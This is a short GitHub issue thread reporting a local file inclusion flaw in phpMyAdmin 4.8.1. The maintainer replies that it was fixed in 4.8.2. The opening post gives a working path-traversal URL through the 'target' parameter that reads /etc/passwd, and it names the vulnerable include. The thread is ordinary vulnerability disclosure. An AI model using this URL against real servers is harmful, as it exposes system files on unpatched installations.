### ISSUE TITLE
Administrator Backstage LFI

### ISSUE THREAD

**Issue by zhzhdoai** [phpmyadmin/phpmyadmin#15062]
http://127.0.0.1/phpadmin/index.php?target=sql.php?/../../../../../../../../etc/passwd

/phpadmin/libraries/classes/Core.php  443
 public static function checkPageValidity(&$page, array $whitelist = [])
'&$page'  does not change  $_REQUEST['target']

In index.php "include $_REQUEST['target'];" will cause LFI

**Comment by mauriciofauth** [comment]
Hi, @zhzhdoai. Thank you for your report.

What is the version of phpMyAdmin you are using?

**Comment by zhzhdoai** [comment]
v4.8.1

**Comment by mauriciofauth** [comment]
This has been fixed in phpMyAdmin version 4.8.2. Please upgrade your installation.
For more details, see [PMASA-2018-4](https://www.phpmyadmin.net/security/PMASA-2018-4/).
Thank you for your report.
